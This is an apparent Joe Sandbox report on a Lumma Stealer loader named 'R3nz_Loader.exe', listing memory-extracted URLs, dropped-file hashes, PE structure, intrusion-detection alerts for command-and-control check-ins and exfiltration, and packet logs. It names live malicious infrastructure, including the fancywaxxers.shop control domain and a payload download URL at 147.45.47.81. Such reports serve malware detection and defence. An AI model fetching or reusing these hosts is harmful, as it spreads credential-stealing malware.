https://duckduckgo.com/ac/?q= | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/X | aspnet_regiis.exe, 00000003.00000003.2063582512.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2064491018.0000000004F34000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/YB | aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://147.45.47.81/conhost.exe | aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/apiAB | aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/api9Bd | aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/int32 | aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/ | aspnet_regiis.exe, 00000003.00000003.2100987956.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101109857.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101077815.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://fancywaxxers.shop/n | aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted-IP map legend (map image not included in this export): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.32.1 | fancywaxxers.shop | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582077
Start date and time: 2024-12-29 23:36:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: R3nz_Loader.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/7@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 35
• Number of non-executed functions: 61
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.160.20, 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: R3nz_Loader.exe

Time | Type | Description
17:36:54 | API Interceptor | 8x Sleep call for process: aspnet_regiis.exe modified
17:37:14 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.32.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | redroomaudio.com/administrator/index.php

Match | Associated Sample Name / URL | Detection | Threat Name | Context
fancywaxxers.shop | Loader.exe | malicious | LummaC | 104.21.80.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Loader.exe | malicious | LummaC | 104.21.80.1
CLOUDFLARENETUS | BasesRow.exe | malicious | LummaC | 104.21.64.1
CLOUDFLARENETUS | dsoft.exe | malicious | Python Stealer, Creal Stealer | 104.26.13.205
CLOUDFLARENETUS | setup.msi | malicious | Unknown | 104.21.0.151
CLOUDFLARENETUS | installer_1.05_36.5.exe | malicious | LummaC | 172.67.208.58
CLOUDFLARENETUS | EFT Payment_Transcript__Survitecgroup.html | malicious | Unknown | 104.18.26.193
CLOUDFLARENETUS | @Setup.exe | malicious | LummaC Stealer | 104.21.32.1
CLOUDFLARENETUS | Lets-x64.exe | malicious | Nitol, Zegost | 104.21.81.224
CLOUDFLARENETUS | KL-3.1.16.exe | malicious | Nitol, Zegost | 104.21.81.224
CLOUDFLARENETUS | Whyet-4.9.exe | malicious | Nitol, Zegost | 104.21.81.224

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | BasesRow.exe | malicious | LummaC | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | installer_1.05_36.5.exe | malicious | LummaC | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | @Setup.exe | malicious | LummaC Stealer | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | GPU-Z.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | Winter.mp4.hta | malicious | LummaC | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | MdhO83N5Fm.exe | malicious | LummaC | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | rfWu0dUz6A.exe | malicious | LummaC | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 104.21.32.1
a0e9f5d64349fb13191bc781f81f42e1 | gdi32.dll | malicious | LummaC | 104.21.32.1
No context
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9915220411873568
Encrypted:false
SSDEEP:192:VOR2G+psXkd0BU/KaGtizuiFVZ24IO8qnf5:VfS0eBU/KaRzuiFVY4IO8qnf
MD5:582C73688AD6120B54A0A15490D44491
SHA1:86DE991BC7B118A29A6F1EA8F480A3B9B04BE2C5
SHA-256:22B8D6486860A06E0B0684D4D70540AA7C39113AD190B5326CF459D4101578E8
SHA-512:A5ECD95443D1E6FEE88705DB5E8731E282C4530185A5A4FCA1B7E81B6ADDF6BDDD236E568FE000D03EB8627C391850508DF9CF65FAC328F84FE2637913D09B9C
Malicious:true
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Sun Dec 29 22:36:54 2024, 0x1205a4 type
Category:dropped
Size (bytes):199358
Entropy (8bit):3.3540321673380293
Encrypted:false
SSDEEP:1536:NRkOrXpN4uE2aO2oLTg/nI+OcGK/yCDwSeCq:NRhT4uEqZLTgvZOcjBwSZ
MD5:EB370DF60B9F703129EA6D66425032F2
SHA1:49CB1A6A4803AB3658ED4921BC13D1214AB327B6
SHA-256:F6C0016BFDC41508E32BB32765651371054AFE58575EADE5EDE8554C804BBA81
SHA-512:3F7B6E1C013D9C4A3E6E83B14678692A928D43C55FE05811229458CC436169E96EB8B3BCE0BC6F0416198242687D082F8469FC4501541693A827ECD619E05CEA
Malicious:false
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8420
Entropy (8bit):3.7043608808146935
Encrypted:false
SSDEEP:192:R6l7wVeJyk6HPT6YEIsSULrcGgmfZRY0prj89bSbsfX8Gm:R6lXJh6HPT6YEDSULAGgmffY1Sgf0
MD5:CA53712F30600D7B9BF2DAAB56485E80
SHA1:597D3117EBAAC0708A2F22636A9AF4FBCED75A68
SHA-256:965953693DB98818DB8EBAF44386F73BF404E60D82B0A9EB089ED947FD29CF53
SHA-512:4525BCEFF966C799C88D551A679F423671744CAE479132F1173B8230AE9A30B4241FA706AF86437FFF47DF5A17BC2CD73805A8FD5BB60921EC0748D8E31030A8
Malicious:false
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4786
Entropy (8bit):4.525371893539953
Encrypted:false
SSDEEP:48:cvIwWl8zsbJg77aI9zQWpW8VY+Ym8M4JB2FW7+q8vkUHV1v4dd:uIjf1I7Jp7V2JR7KJHV1v0d
MD5:B2987132B120B907905FA11AEE242C93
SHA1:A6F6868D8C23A7DE9434BE44329608AC3ED64D5A
SHA-256:D6AE230A4E8A02DA4F55F7522F6FD248577A3C32285589D001F6F6579F319D40
SHA-512:A8EDC5DD73860628853D5FB9BEACC547F12600658ECA64D96327EEF534624D78DBD5496EB110473F64026C6C8D3C017B112DA1ACE0337115B97824BBF1E4B1E7
Malicious:false
Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
 <src>
 <desc>
 <mach>
 <os>
 <arg nm="vermaj" val="10" />
 <arg nm="vermin" val="0" />
 <arg nm="verbld" val="19045" />
 <arg nm="vercsdbld" val="2006" />
 <arg nm="verqfe" val="2006" />
 <arg nm="csdbld" val="2006" />
 <arg nm="versp" val="0" />
 <arg nm="arch" val="9" />
 <arg nm="lcid" val="2057" />
 <arg nm="geoid" val="223" />
 <arg nm="sku" val="48" />
 <arg nm="domain" val="0" />
 <arg nm="prodsuite" val="256" />
 <arg nm="ntprodtype" val="1" />
 <arg nm="platid" val="2" />
 <arg nm="tmsi" val="653139" />
 <arg nm="osinsty" val="1" />
 <arg nm="iever" val="11.789.19041.0-11.0.1000" />
 <arg nm="portos" val="0" />
 <arg nm="ram" val="409
Process:C:\Users\user\Desktop\R3nz_Loader.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):443392
Entropy (8bit):7.128674977243316
Encrypted:false
SSDEEP:6144:+EQUaPo0tMBs/8d7+OUbY79SXh61wICBqrH9TmXCf5OthEVriynomZG:qPoY/srM+4o1w+LcXlExi4lZG
MD5:747539CEFB1EF3C38AD756A2F5305097
SHA1:6F5CE5B9D430931164E4B3E57DF4C98EA0F82C34
SHA-256:05512CA3A16E8D0FB965DE8F20E9A9F0B046F3D3384D89D767C4D875182BDA3F
SHA-512:4A9934BD7A2F8BFEC4DDFA0A7E9D24DBDFCEE864163804D9B3B726AB16209F1DE43A3CBD3E003531758C5C2A68AC21549C3A4DF7B6EE1E373D9A0DD8C1F209C6
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.421673815632608
Encrypted:false
SSDEEP:6144:lSvfpi6ceLP/9skLmb0OToWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:svloToW+EZMM6DFy003w
MD5:7D7FBE8A69395F920AEBE7ECB0E7677B
SHA1:30B5A3BA9C05015EE4D4CFA78EA2EB442D898F40
SHA-256:5BD44443F8ED2E008509ACE20BCA32BCEB158A164B43D855D358B3E289C5EC17
SHA-512:B3B91C3BB0FDEAC91C88FD3E39F4C253FD8C317A91237841076C4733DE3C1CAD75C6C05ADE914E545AD617A7BB2EFA9A49219AF961B7B4268246FCF195F724D1
Malicious:false
Reputation:low
Process:C:\Users\user\Desktop\R3nz_Loader.exe
File Type:ASCII text, with very long lines (354), with CRLF, LF line terminators
Category:dropped
Size (bytes):1415
Entropy (8bit):4.541407831894227
Encrypted:false
SSDEEP:24:7v74Nu5MvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4cMff2p8p14nrPKktp
MD5:1F8E54DB13948BF2759E2DE1AEF4FF27
SHA1:147E07C6B98CFF68D51C34CF30E338A8A17C156B
SHA-256:3D638F789F4CC5B75D505F12DFF02DEA7FB8B7CF3D91DE35B56BA98C1CA038AF
SHA-512:CC73D243D70EE2E26E1858E074B26DDF2F02CB06970D6B78E7E9EC9C449334FBA86FC7337073D80025EE15E34F7EC22026957B9E1D6A05DC6795D2CECD0F6442
Malicious:false
Reputation:low
Preview:
Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "XeniaHarveyKaitlyn" at compile time, or that all the satellite assemblies required are loadable and fully signed.
   at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName)
   at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark)
   at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark)
   at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents)
   at System.Resources.ResourceManager.GetSt
File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.737994793682443
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.96%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:R3nz_Loader.exe
File size:706'048 bytes
MD5:b43d8eca7777b170ddc40a824ab10bb6
SHA1:a7da0bbde621a7df3489b394ee4e5cea963225e6
SHA256:1db1a4c253278293c863dff9759c6577f1b6b5b8f69ac0c612338453eeea96d9
SHA512:54c6ec0681b7e67782c4d142450f84bef5129c4cfa4dfbd70edc63bd3385d8cc9277cdfbcf2c3a8f6c5cb49b9252eb8c46984a65164164886b805e084e6bbb55
SSDEEP:12288:ENvwXTkEVI9HBoDWupxGsFITxLmIJpCbp4/MLq/xgtQS7iBDgCL+ZNNzloh3LouP:ENoXQEV2hozxG0c0bp2Y4oQSW
TLSH:EFE47B9C726072DFC867D472DEA82C68FA9174BB871F4217A02716AD9E0D897CF150F2
Icon Hash:00928e8e8686b000
Entrypoint:0x4b400a
Entrypoint Section:
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x6771CD0F [Sun Dec 29 22:28:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [004B4000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8e780 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x640 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb4000 | 0x8 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x8e000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
^]tBD;I | 0x2000 | 0x8a8cc | 0x8aa00 | 4aba24cfb364dff8e98778b6d82a69fd | False | 1.0003187697249774 | data | 7.999688407134414 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text | 0x8e000 | 0x20b48 | 0x20c00 | f53637936f05b21a5b09ae51f5f57bac | False | 0.3313976025763359 | data | 4.688971111396578 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x640 | 0x800 | d018ee0af29c98b01b7fd3895a878684 | False | 0.36279296875 | data | 3.5529147255674487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb2000 | 0xc | 0x200 | 49ba7a9e1e9d0fde8dd025f5fdb99dfe | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0xb4000 | 0x10 | 0x200 | 45934a465f9653459a1ea07b453b8625 | False | 0.044921875 | data | 0.14263576814887827 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb00a0 | 0x3b4 | data | | | 0.45675105485232065
RT_MANIFEST | 0xb0454 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-29T23:36:55.447181+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:55.916300+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:55.916300+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:56.516425+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:56.980247+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:56.980247+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:57.936435+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:59.137265+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:59.618823+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49709 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:00.850104+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49714 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:02.386572+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:04.357809+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:06.910342+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49717 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:07.362321+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49717 | 104.21.32.1 | 443 | TCP
                                                                            Dec 29, 2024 23:37:04.400299072 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.400312901 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.400419950 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.405297041 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.465044975 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.465157986 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.465221882 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.465459108 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.465466976 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.475269079 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.475318909 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.475580931 CET49717443192.168.2.5104.21.32.1
